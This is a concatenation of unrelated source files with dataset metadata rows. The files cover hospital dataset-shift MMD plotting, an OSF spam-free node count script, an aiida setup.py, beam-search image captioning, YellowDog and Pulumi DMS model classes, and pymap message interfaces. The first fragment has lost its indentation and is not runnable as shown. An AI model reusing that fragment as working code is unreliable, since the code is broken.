# cmap = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
if test_type == 'univ':
# hosp_pair_feat_pval = hosp_pair_feat_pval.min(axis=0) # Bonferroni correction by taking min across hospital pairs
# hosp_pair_feat_avg_pval = hosp_pair_feat_pval.mean(axis=1) < adjust_sign_level # mean across random runs
hosp_pair_feat_avg_pval = hosp_pair_feat_pval.mean(axis=0)
feature_set_escaped = [i.replace('_', '\_') for i in feature_set]
hosp_pair_feat_avg_pval = pd.DataFrame(hosp_pair_feat_avg_pval, index=feature_set_escaped)
hosp_pair_feat_avg_pval.columns=["Features"]
hosp_pair_feat_avg_pval.to_csv("%s/%s_%s_%s_%s_feat_avg_pval_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
plt.figure(figsize=(8, 6))
fig = sns.heatmap(hosp_pair_feat_avg_pval, linewidths=0.5, cmap=cmap, square=True)
plt.savefig("%s/%s_%s_%s_%s_feat_avg_pval_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
hosp_pair_feat_avg_tval = hosp_pair_feat_tval.mean(axis=0)
hosp_pair_feat_avg_tval = pd.DataFrame(hosp_pair_feat_avg_tval, index=feature_set_escaped)
hosp_pair_feat_avg_tval.columns=["Features"]
hosp_pair_feat_avg_tval.to_csv("%s/%s_%s_%s_%s_feat_avg_tval_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
plt.figure(figsize=(8, 6))
fig = sns.heatmap(hosp_pair_feat_avg_tval, linewidths=0.5, cmap=cmap, square=True)
plt.savefig("%s/%s_%s_%s_%s_feat_avg_tval_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
# Minimum of the pairwise average tval in subsets of 5 hospitals
MAX_NUM_SUBSET = 5
HospitalIDs_ = np.array(HospitalIDsColnames)
for num_subset in range(1, MAX_NUM_SUBSET+1):
avg_tval_subset = []
for subs in combinations(range(len(HospitalIDs_)), num_subset):
avg_tval_subset.append((subs, hosp_pair_tval[np.ix_(subs,subs)].mean()))
avg_tval_subset_sorted = sorted(avg_tval_subset, key=lambda x: x[1])
avg_tval_subset_sorted = [(HospitalIDs_[np.array(subs)],mmd) for subs,mmd in avg_tval_subset_sorted]
avg_tval_subset_sorted = pd.DataFrame(avg_tval_subset_sorted, columns=['HospitalIDs','average_MMD'])
avg_tval_subset_sorted.to_csv("%s/%s_%s_%s_%s_%s_t_val_min_subset.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, num_subset), index=False)
# MMD statistic value
hosp_avg_tval = hosp_pair_tval.mean(axis=1)
                hosp_pair_tval_triu = np.triu(np.ones_like(hosp_pair_tval, dtype=bool))  # np.bool is removed in recent NumPy
np.fill_diagonal(hosp_pair_tval_triu, False)
hosp_pair_tval = pd.DataFrame(hosp_pair_tval, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_tval.to_csv("%s/%s_%s_%s_%s_t_val_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
# cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
# fig = sns.heatmap(hosp_pair_tval, linewidths=0.5, cmap=cmap)
fig = sns.heatmap(hosp_pair_tval, mask=hosp_pair_tval_triu, linewidths=0.5, cmap=cmap)
label_text = 'Hospital ID'
if use_group and group_type=='regions':
label_text = 'Region'
elif use_group and group_type=='beds':
label_text = 'Numbedscategory'
plt.xlabel(label_text) # Target
plt.ylabel(label_text) # Source
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_t_val_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
hosp_all_pairs_tval = pd.melt(hosp_pair_tval.reset_index(), id_vars='index')
hosp_all_pairs_tval.columns = ['Source','Target','MMD']
if dr == DimensionalityReduction.NoRed.value: # TODO run auc smr plots only once in dr_techniques_plot
h_stats_all = hosp_all_pairs_tval
for metric_idx in range(NUM_METRICS):
if metric_names[metric_idx] in ['csdiff', 'cs', 'fnrsign', 'csdispsign', 'aucdispsign']:
cmap = sns.color_palette("vlag", as_cmap=True)
elif metric_names[metric_idx] in ['aucdiff', 'auc']:
cmap = sns.color_palette("rocket", as_cmap=True)
else:
cmap = sns.color_palette("rocket_r", as_cmap=True)
metric_name = metric_names[metric_idx].replace('_', '\_')
feats_shifts_samples_metric = samples_shifts_rands_feats_hosp_pairs_te_acc[si,shift_idx,:,feature_group_idx,:,:,metric_idx]
mean_te_metric = np.mean(feats_shifts_samples_metric, axis=0)
std_te_metric = np.std(feats_shifts_samples_metric, axis=0)
# hosp_avg_metric = mean_te_metric.mean(axis=1)
# hosp_min_metric = mean_te_metric.min(axis=1)
hosp_pair_metric = pd.DataFrame(mean_te_metric, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_metric.to_csv("%s/%s_%s_%s_%s_%s_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), index=True)
# cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
center, vmin, vmax = None, None, None
if not use_group:
if metric_names[metric_idx] in ['csdisp', 'aucdisp', 'fnr']:
center, vmin, vmax = None, None, np.nanpercentile(mean_te_metric,97.5)
elif metric_names[metric_idx] in ['csdispsign', 'aucdispsign', 'fnrsign', 'fnrmin', 'fnrmaj']:
center, vmin, vmax = 0, np.nanpercentile(mean_te_metric,2.5), np.nanpercentile(mean_te_metric,97.5)
elif metric_names[metric_idx] in ['csmin', 'csmaj']:
center, vmin, vmax = 1, np.nanpercentile(mean_te_metric,2.5), np.nanpercentile(mean_te_metric,97.5)
fig = sns.heatmap(hosp_pair_metric, linewidths=0.5, cmap=cmap, center=center, vmin=vmin, vmax=vmax)
xlabel_text = 'Test Hospital ID'
ylabel_text = 'Train Hospital ID'
if use_group and group_type=='regions':
xlabel_text = 'Test Region'
ylabel_text = 'Train Region'
elif use_group and group_type in ['beds', 'regions_beds', 'regions_beds_teaching']:
xlabel_text = 'Test Category'
ylabel_text = 'Train Category'
plt.xlabel(xlabel_text)
plt.ylabel(ylabel_text)
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_%s_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), bbox_inches='tight')
plt.clf()
hosp_all_pairs_metric = pd.melt(hosp_pair_metric.reset_index(), id_vars='index')
hosp_all_pairs_metric.columns = ['Source','Target',metric_name]
h_stats_all = h_stats_all.merge(hosp_all_pairs_metric, how='left',
left_on=['Source','Target'], right_on = ['Source','Target'])
# plot only across hospital results
h_stats_all = h_stats_all[h_stats_all.Source!=h_stats_all.Target]
for metric_idx in range(NUM_METRICS):
metric_name = metric_names[metric_idx].replace('_', '\_')
fig = sns.regplot(data=h_stats_all, x='MMD', y=metric_name, scatter_kws={"s": 80, 'alpha':0.6}, truncate=False)
try:
corr_coef, pval_corr_coef = stats.pearsonr(h_stats_all['MMD'], h_stats_all[metric_name])
except ValueError as err:
print(feature_group, metric_name)
print(err)
corr_coef = 0.0
pval_corr_coef = 1.0
textstr = '\n'.join((
r'Pearson corr.=%.4f' % (corr_coef, ),
r'p-val=%.4f' % (pval_corr_coef, )))
# these are matplotlib.patch.Patch properties
props = dict(boxstyle='round', facecolor='white', alpha=0.5)
# place a text box in upper left in axes coords
fig.text(0.5, 0.95, textstr, transform=fig.transAxes, fontsize=14,
verticalalignment='top', bbox=props)
plt.xlabel('$MMD^2$')
plt.ylabel('Generalization gap in {}'.format(metric_name))
plt.savefig("%s/%s_%s_%s_%s_mmd_%s_scatter.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), bbox_inches='tight')
plt.clf()
h_stats_all.to_csv("%s/hstats_all_%s_%s_%s_%s_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
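# Added usage note: downstream analysis typically reloads the aggregated
# arrays saved earlier in this script, e.g. for the MMD statistic values
# (run_path is the same run directory computed at the top of the script).
def _load_aggregated_mmd(run_path):
    return np.load("%s/samples_shifts_rands_dr_tech_feats_hosps_t_val.npy" % run_path)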
| 59.430407
| 269
| 0.646285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8,601
| 0.309901
|
3c57f29eb95c40842b9781c30c39516ef8329161
| 1,285
|
py
|
Python
|
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | 1
|
2019-12-23T04:30:20.000Z
|
2019-12-23T04:30:20.000Z
|
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | null | null | null |
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | null | null | null |
import sys
import csv
import logging
import datetime
from website.app import setup_django
setup_django()
from osf.models import Node, SpamStatus
from django.db.models import Count
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def main():
dry_run = '--dry' in sys.argv
if not dry_run:
script_utils.add_file_logger(logger, __file__)
nodes_excluding_spam = Node.objects.filter(is_deleted=False, created__gte=datetime.datetime(2018, 3, 14)).exclude(spam_status__in=[SpamStatus.SPAM, SpamStatus.FLAGGED])
# The extra statement here is to round down the datetimes so we can count by dates only
data = nodes_excluding_spam.extra({'date_created': 'date(created)'}).values('date_created').annotate(count=Count('id')).order_by('date_created')
with open('spamless_node_count_through_2018_3_14.csv', mode='w') as csv_file:
fieldnames = ['date_created', 'count']
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
if not dry_run:
writer.writeheader()
for data_point in data:
writer.writerow(data_point)
logger.info('Writing csv data for {} dates'.format(data.count()))
if __name__ == '__main__':
main()
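# Added usage note: the script is intended to be run directly; passing --dry
# (checked in main() above) skips file logging and the CSV header row, e.g.
#   python -m scripts.remove_after_use.create_spam_node_count_csv --dry
# The exact module path is an assumption based on the repository layout.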
| 32.125
| 173
| 0.721401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 263
| 0.204669
|
3c583e3a31b0df8d7782674e1b493230037e47ae
| 780
|
py
|
Python
|
setup.py
|
greschd/aiida-pytest-mock-codes
|
0d104fbad481c6dd2e5a0725e65dc2208fb8058b
|
[
"MIT"
] | 2
|
2020-02-27T16:52:54.000Z
|
2021-07-17T09:07:28.000Z
|
setup.py
|
greschd/aiida-pytest-mock-codes
|
0d104fbad481c6dd2e5a0725e65dc2208fb8058b
|
[
"MIT"
] | 31
|
2020-02-27T10:51:27.000Z
|
2022-03-04T11:24:26.000Z
|
setup.py
|
greschd/aiida-pytest-mock-codes
|
0d104fbad481c6dd2e5a0725e65dc2208fb8058b
|
[
"MIT"
] | 5
|
2020-02-27T13:31:42.000Z
|
2022-01-31T18:49:06.000Z
|
#!/usr/bin/env python
"""Set up aiida-testing package."""
import os
import warnings
import setuptools
from setuptools.config import read_configuration
try:
import fastentrypoints # NOQA # pylint: disable=unused-import
except ImportError:
warnings.warn(
"The 'fastentrypoints' module could not be loaded. "
"Installed console script will be slower."
)
SETUP_CONFIG_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'setup.cfg')
SETUP_KWARGS = read_configuration(SETUP_CONFIG_PATH)
EXTRAS_REQUIRE = SETUP_KWARGS['options']['extras_require']
EXTRAS_REQUIRE['dev'] = (
EXTRAS_REQUIRE["docs"] + EXTRAS_REQUIRE["testing"] + EXTRAS_REQUIRE["pre_commit"]
)
if __name__ == "__main__":
setuptools.setup(extras_require=EXTRAS_REQUIRE)
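# Added usage note: with the aggregated 'dev' extra defined above, a local
# development install would typically be
#   pip install -e .[dev]
# (the distribution name itself comes from setup.cfg, which is not shown here).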
| 30
| 89
| 0.744872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 267
| 0.342308
|
3c595afdb533a0fc9550d6782a8298265522f096
| 8,299
|
py
|
Python
|
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | 3
|
2021-04-12T02:23:18.000Z
|
2022-01-06T12:05:24.000Z
|
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | null | null | null |
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | null | null | null |
import os
import time
import h5py
import json
from PIL import Image
import torch
from torch import nn
import torchvision
import torchvision.transforms as transforms
import torch.optim
import torch.nn.functional as F
from torch.utils.data.dataset import random_split
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pack_padded_sequence
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.utils import class_weight
from tqdm.notebook import tqdm
import matplotlib.cm as cm
import torch.backends.cudnn as cudnn
import torch.utils.data
import skimage.transform
from scipy.misc import imread, imresize
device = torch.device("cpu")
def caption_image(encoder, decoder, image_path, word_map, beam_size=3):
"""
Reads an image and captions it with beam search.
Input:
:param encoder: encoder model
:param decoder: decoder model
:param image_path: path to image
:param word_map: word map(word to index mapping)
:param beam_size: number of sequences to consider at each decode-step
Output:
:return: caption, weights for visualization
"""
k = beam_size
vocab_size = len(word_map)
## Read image and process
img = imread(image_path)
if len(img.shape) == 2:
img = img[:, :, np.newaxis]
img = np.concatenate([img, img, img], axis=2)
img = imresize(img, (256, 256))
img = img.transpose(2, 0, 1)
img = img / 255.
img = torch.FloatTensor(img).to(device)
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform = transforms.Compose([normalize])
image = transform(img) # (3, 256, 256)
# Encode
# (1, 3, 256, 256)
image = image.unsqueeze(0)
#(1, enc_image_size, enc_image_size, encoder_dim)
#(1, 14, 14, 2048)
encoder_out = encoder(image)
enc_image_size = encoder_out.size(1)
encoder_dim = encoder_out.size(3)
# Flatten encoding
# (1, num_pixels, encoder_dim)
# (1, 196, 2048)
encoder_out = encoder_out.view(1, -1, encoder_dim)
num_pixels = encoder_out.size(1)
# We'll treat the problem as having a batch size of k
# (k, num_pixels, encoder_dim)
encoder_out = encoder_out.expand(k, num_pixels, encoder_dim)
# Tensor to store top k previous words at each step; now they're just <start>
k_prev_words = torch.LongTensor([[word_map['<start>']]] * k).to(device) # (k, 1)
# Tensor to store top k sequences; now they're just <start>
# (k, 1)
seqs = k_prev_words
# Tensor to store top k sequences scores; now they're just 0
top_k_scores = torch.zeros(k, 1).to(device) # (k, 1)
# Tensor to store top k sequences alphas; now they're just 1s
# (k, 1, enc_image_size, enc_image_size)
seqs_alpha = torch.ones(k, 1, enc_image_size, enc_image_size).to(device)
# Lists to store completed sequences, their alphas and scores
complete_seqs = list()
complete_seqs_alpha = list()
complete_seqs_scores = list()
# Start decoding
step = 1
h, c = decoder.init_hidden_state(encoder_out)
# s is a number less than or equal to k,
# because sequences are removed from this process once they hit <end>
while True:
# (s, embed_dim)
embeddings = decoder.embedding(k_prev_words).squeeze(1)
# (s, encoder_dim), (s, num_pixels)
awe, alpha = decoder.attention(encoder_out, h)
# (s, enc_image_size, enc_image_size)
alpha = alpha.view(-1, enc_image_size, enc_image_size)
# gating scalar, (s, encoder_dim)
gate = decoder.sigmoid(decoder.f_beta(h))
awe = gate * awe
# (s, decoder_dim)
h, c = decoder.decode_step(torch.cat([embeddings, awe], dim=1), (h, c))
# (s, vocab_size)
scores = decoder.fc(h)
scores = F.log_softmax(scores, dim=1)
# Add
scores = top_k_scores.expand_as(scores) + scores # (s, vocab_size)
# For the first step, all k points will have the same scores (since same k previous words, h, c)
if step == 1:
top_k_scores, top_k_words = scores[0].topk(k, 0, True, True) # (s)
else:
# Unroll and find top scores, and their unrolled indices
top_k_scores, top_k_words = scores.view(-1).topk(k, 0, True, True) # (s)
# print(top_k_words)
# Convert unrolled indices to actual indices of scores
prev_word_inds = top_k_words // vocab_size # (s)
next_word_inds = top_k_words % vocab_size # (s)
# print(seqs[prev_word_inds])
# Add new words to sequences, alphas
seqs = torch.cat([seqs[prev_word_inds], next_word_inds.unsqueeze(1)], dim=1) # (s, step+1)
seqs_alpha = torch.cat([seqs_alpha[prev_word_inds], alpha[prev_word_inds].unsqueeze(1)],
dim=1) # (s, step+1, enc_image_size, enc_image_size)
# Which sequences are incomplete (didn't reach <end>)?
incomplete_inds = [ind for ind, next_word in enumerate(next_word_inds) if
next_word != word_map['<end>']]
## will be empty if none of them have reached <end>
complete_inds = list(set(range(len(next_word_inds))) - set(incomplete_inds))
# Set aside complete sequences
if len(complete_inds) > 0:
complete_seqs.extend(seqs[complete_inds].tolist())
complete_seqs_alpha.extend(seqs_alpha[complete_inds].tolist())
complete_seqs_scores.extend(top_k_scores[complete_inds])
k -= len(complete_inds) # reduce beam length accordingly
# Proceed with incomplete sequences
if k == 0:
break
seqs = seqs[incomplete_inds]
seqs_alpha = seqs_alpha[incomplete_inds]
### updating h's and c's for incomplete sequences
h = h[prev_word_inds[incomplete_inds]]
c = c[prev_word_inds[incomplete_inds]]
encoder_out = encoder_out[prev_word_inds[incomplete_inds]]
top_k_scores = top_k_scores[incomplete_inds].unsqueeze(1)
k_prev_words = next_word_inds[incomplete_inds].unsqueeze(1)
# Break if things have been going on too long
if step > 40:
break
step += 1
# print(complete_seqs)
i = complete_seqs_scores.index(max(complete_seqs_scores))
seq = complete_seqs[i]
alphas = complete_seqs_alpha[i]
return seq, alphas
# def visualize_att(image_path, seq, alphas, rev_word_map, smooth=False):
# """
# Visualizes caption with weights at every word.
# Adapted from paper authors' repo: https://github.com/kelvinxu/arctic-captions/blob/master/alpha_visualization.ipynb
# :param image_path: path to image
# :param seq: generated caption
# :param alphas: attention weights for every time steps
# :param rev_word_map: reverse word mapping, i.e. ix2word
# :param smooth: smooth weights?
# """
# image = Image.open(image_path)
# image = image.resize([14 * 14, 14 * 14], Image.LANCZOS)
# words = [rev_word_map[ind] for ind in seq]
# figures = []
# for t in range(len(words)):
# fig = plt.figure()
# if t > 50:
# break
# #plt.subplot(np.ceil(len(words) / 5.), 5, t + 1)
# fig.text(0, 1, '%s' % (words[t]), color='black', backgroundcolor='white', fontsize=12)
# plt.imshow(image)
# current_alpha = alphas[t, :]
# if smooth:
# alpha = skimage.transform.pyramid_expand(current_alpha.numpy(), upscale=14, sigma=8)
# else:
# alpha = skimage.transform.resize(current_alpha.numpy(), [14 * 14, 14 * 14])
# if t == 0:
# plt.imshow(alpha, alpha=0)
# else:
# plt.imshow(alpha, alpha=0.8)
# plt.set_cmap(cm.Greys_r)
# plt.axis('off')
# figures.append(fig)
# #plt.savefig("horse_riding/"+words[t]+ str(t)+'.png', bbox_inches = 'tight', pad_inches = 0)
# plt.show()
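# Added usage sketch: a hedged example of calling caption_image(). The
# checkpoint layout ('encoder'/'decoder' keys) and the word-map filename are
# assumptions, not taken from this file.
def _example_caption(image_path='dress.jpg'):
    checkpoint = torch.load('BEST_checkpoint.pth.tar', map_location=device)
    encoder = checkpoint['encoder'].to(device).eval()
    decoder = checkpoint['decoder'].to(device).eval()
    with open('WORDMAP.json') as f:
        word_map = json.load(f)
    rev_word_map = {v: k for k, v in word_map.items()}
    seq, _alphas = caption_image(encoder, decoder, image_path, word_map, beam_size=5)
    return ' '.join(rev_word_map[ind] for ind in seq)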
| 32.291829
| 121
| 0.616821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,571
| 0.430293
|
3c599676a9ae26a258559d911189a12f55452ddf
| 666
|
py
|
Python
|
src/yellowdog_client/model/internal_user.py
|
yellowdog/yellowdog-sdk-python-public
|
da69a7d6e45c92933e34fefcaef8b5d98dcd6036
|
[
"Apache-2.0"
] | null | null | null |
src/yellowdog_client/model/internal_user.py
|
yellowdog/yellowdog-sdk-python-public
|
da69a7d6e45c92933e34fefcaef8b5d98dcd6036
|
[
"Apache-2.0"
] | null | null | null |
src/yellowdog_client/model/internal_user.py
|
yellowdog/yellowdog-sdk-python-public
|
da69a7d6e45c92933e34fefcaef8b5d98dcd6036
|
[
"Apache-2.0"
] | null | null | null |
from dataclasses import dataclass, field
from typing import List, Optional
from .access_delegate import AccessDelegate
from .password_state import PasswordState
from .user import User
@dataclass
class InternalUser(User):
"""Represents an internal user within the YellowDog Platform."""
type: str = field(default="co.yellowdog.platform.model.InternalUser", init=False)
id: Optional[str] = field(default=None, init=False)
passwordState: Optional[PasswordState] = field(default=None, init=False)
username: str
name: str
email: Optional[str] = None
eulaAccepted: bool = False
accessDelegates: Optional[List[AccessDelegate]] = None
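# Added usage sketch: constructing the dataclass defined above. Only username
# and name are required here, assuming the User base class introduces no
# further required constructor fields.
def _example_internal_user() -> InternalUser:
    return InternalUser(username="jdoe", name="Jane Doe",
                        email="jdoe@example.com", eulaAccepted=True)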
| 33.3
| 85
| 0.753754
| 467
| 0.701201
| 0
| 0
| 478
| 0.717718
| 0
| 0
| 106
| 0.159159
|
3c59b7068b704fe1f1c47ee7e6a0b30a676e031e
| 6,891
|
py
|
Python
|
sdk/python/pulumi_aws/dms/replication_task.py
|
pulumi-bot/pulumi-aws
|
756c60135851e015232043c8206567101b8ebd85
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/dms/replication_task.py
|
pulumi-bot/pulumi-aws
|
756c60135851e015232043c8206567101b8ebd85
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/dms/replication_task.py
|
pulumi-bot/pulumi-aws
|
756c60135851e015232043c8206567101b8ebd85
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
class ReplicationTask(pulumi.CustomResource):
"""
Provides a DMS (Data Migration Service) replication task resource. DMS replication tasks can be created, updated, deleted, and imported.
"""
def __init__(__self__, __name__, __opts__=None, cdc_start_time=None, migration_type=None, replication_instance_arn=None, replication_task_id=None, replication_task_settings=None, source_endpoint_arn=None, table_mappings=None, tags=None, target_endpoint_arn=None):
"""Create a ReplicationTask resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, basestring):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if cdc_start_time and not isinstance(cdc_start_time, basestring):
raise TypeError('Expected property cdc_start_time to be a basestring')
__self__.cdc_start_time = cdc_start_time
"""
The Unix timestamp integer for the start of the Change Data Capture (CDC) operation.
"""
__props__['cdcStartTime'] = cdc_start_time
if not migration_type:
raise TypeError('Missing required property migration_type')
elif not isinstance(migration_type, basestring):
raise TypeError('Expected property migration_type to be a basestring')
__self__.migration_type = migration_type
"""
The migration type. Can be one of `full-load | cdc | full-load-and-cdc`.
"""
__props__['migrationType'] = migration_type
if not replication_instance_arn:
raise TypeError('Missing required property replication_instance_arn')
elif not isinstance(replication_instance_arn, basestring):
raise TypeError('Expected property replication_instance_arn to be a basestring')
__self__.replication_instance_arn = replication_instance_arn
"""
The Amazon Resource Name (ARN) of the replication instance.
"""
__props__['replicationInstanceArn'] = replication_instance_arn
if not replication_task_id:
raise TypeError('Missing required property replication_task_id')
elif not isinstance(replication_task_id, basestring):
raise TypeError('Expected property replication_task_id to be a basestring')
__self__.replication_task_id = replication_task_id
"""
The replication task identifier.
"""
__props__['replicationTaskId'] = replication_task_id
if replication_task_settings and not isinstance(replication_task_settings, basestring):
raise TypeError('Expected property replication_task_settings to be a basestring')
__self__.replication_task_settings = replication_task_settings
"""
An escaped JSON string that contains the task settings. For a complete list of task settings, see [Task Settings for AWS Database Migration Service Tasks](http://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.CustomizingTasks.TaskSettings.html).
"""
__props__['replicationTaskSettings'] = replication_task_settings
if not source_endpoint_arn:
raise TypeError('Missing required property source_endpoint_arn')
elif not isinstance(source_endpoint_arn, basestring):
raise TypeError('Expected property source_endpoint_arn to be a basestring')
__self__.source_endpoint_arn = source_endpoint_arn
"""
The Amazon Resource Name (ARN) string that uniquely identifies the source endpoint.
"""
__props__['sourceEndpointArn'] = source_endpoint_arn
if not table_mappings:
raise TypeError('Missing required property table_mappings')
elif not isinstance(table_mappings, basestring):
raise TypeError('Expected property table_mappings to be a basestring')
__self__.table_mappings = table_mappings
"""
An escaped JSON string that contains the table mappings. For information on table mapping see [Using Table Mapping with an AWS Database Migration Service Task to Select and Filter Data](http://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.CustomizingTasks.TableMapping.html)
"""
__props__['tableMappings'] = table_mappings
if tags and not isinstance(tags, dict):
raise TypeError('Expected property tags to be a dict')
__self__.tags = tags
"""
A mapping of tags to assign to the resource.
"""
__props__['tags'] = tags
if not target_endpoint_arn:
raise TypeError('Missing required property target_endpoint_arn')
elif not isinstance(target_endpoint_arn, basestring):
raise TypeError('Expected property target_endpoint_arn to be a basestring')
__self__.target_endpoint_arn = target_endpoint_arn
"""
The Amazon Resource Name (ARN) string that uniquely identifies the target endpoint.
"""
__props__['targetEndpointArn'] = target_endpoint_arn
__self__.replication_task_arn = pulumi.runtime.UNKNOWN
"""
The Amazon Resource Name (ARN) for the replication task.
"""
super(ReplicationTask, __self__).__init__(
'aws:dms/replicationTask:ReplicationTask',
__name__,
__props__,
__opts__)
def set_outputs(self, outs):
if 'cdcStartTime' in outs:
self.cdc_start_time = outs['cdcStartTime']
if 'migrationType' in outs:
self.migration_type = outs['migrationType']
if 'replicationInstanceArn' in outs:
self.replication_instance_arn = outs['replicationInstanceArn']
if 'replicationTaskArn' in outs:
self.replication_task_arn = outs['replicationTaskArn']
if 'replicationTaskId' in outs:
self.replication_task_id = outs['replicationTaskId']
if 'replicationTaskSettings' in outs:
self.replication_task_settings = outs['replicationTaskSettings']
if 'sourceEndpointArn' in outs:
self.source_endpoint_arn = outs['sourceEndpointArn']
if 'tableMappings' in outs:
self.table_mappings = outs['tableMappings']
if 'tags' in outs:
self.tags = outs['tags']
if 'targetEndpointArn' in outs:
self.target_endpoint_arn = outs['targetEndpointArn']
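# Added usage sketch (not generated code): instantiating the resource through
# the legacy positional-name constructor above; the ARNs and table mappings
# are placeholders.
def _example_replication_task():
    return ReplicationTask(
        'example-task',
        migration_type='full-load',
        replication_instance_arn='arn:aws:dms:us-east-1:123456789012:rep:EXAMPLE',
        replication_task_id='example-task',
        source_endpoint_arn='arn:aws:dms:us-east-1:123456789012:endpoint:SOURCE',
        table_mappings='{"rules": []}',
        target_endpoint_arn='arn:aws:dms:us-east-1:123456789012:endpoint:TARGET')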
| 49.57554
| 288
| 0.689015
| 6,668
| 0.967639
| 0
| 0
| 0
| 0
| 0
| 0
| 3,176
| 0.460891
|
3c5b0b5866a106b628ab68aee24923fb36a181b9
| 8,674
|
py
|
Python
|
pymap/interfaces/message.py
|
BoniLindsley/pymap
|
b3190d20799a6d342888e51bfc55cdfcbfe3ed26
|
[
"MIT"
] | 18
|
2015-06-04T21:09:37.000Z
|
2022-03-04T08:14:31.000Z
|
pymap/interfaces/message.py
|
BoniLindsley/pymap
|
b3190d20799a6d342888e51bfc55cdfcbfe3ed26
|
[
"MIT"
] | 114
|
2018-10-17T23:11:00.000Z
|
2022-03-19T16:59:16.000Z
|
pymap/interfaces/message.py
|
BoniLindsley/pymap
|
b3190d20799a6d342888e51bfc55cdfcbfe3ed26
|
[
"MIT"
] | 8
|
2015-02-03T19:30:52.000Z
|
2021-11-20T12:47:03.000Z
|
from __future__ import annotations
from abc import abstractmethod
from collections.abc import Collection, Sequence
from datetime import datetime
from typing import TypeVar, Protocol
from ..bytes import Writeable
from ..flags import SessionFlags
from ..parsing.response.fetch import EnvelopeStructure, BodyStructure
from ..parsing.specials import Flag, ObjectId, FetchRequirement
__all__ = ['MessageT', 'MessageT_co', 'FlagsKey', 'CachedMessage',
'MessageInterface', 'LoadedMessageInterface']
#: Type variable with an upper bound of :class:`MessageInterface`.
MessageT = TypeVar('MessageT', bound='MessageInterface')
#: Covariant type variable with an upper bound of :class:`MessageInterface`.
MessageT_co = TypeVar('MessageT_co', bound='MessageInterface', covariant=True)
#: Type alias for the value used as a key in set comparisons detecting flag
#: updates.
FlagsKey = tuple[int, frozenset[Flag]]
class CachedMessage(Protocol):
"""Cached message metadata used to track state changes. Used to produce
untagged FETCH responses when a message's flags have changed, or when a
FETCH command requests metadata of an expunged message before its untagged
EXPUNGE response has been sent.
This is intended to be compatible with :class:`MessageInterface`, and
should be implemented by the same classes in most cases.
"""
__slots__: Sequence[str] = []
@property
@abstractmethod
def uid(self) -> int:
"""The message's unique identifier in the mailbox."""
...
@property
@abstractmethod
def internal_date(self) -> datetime:
"""The message's internal date."""
...
@property
@abstractmethod
def permanent_flags(self) -> frozenset[Flag]:
"""The permanent flags for the message."""
...
@property
@abstractmethod
def email_id(self) -> ObjectId:
"""The message's email object ID."""
...
@property
@abstractmethod
def thread_id(self) -> ObjectId:
"""The message's thread object ID."""
...
@property
@abstractmethod
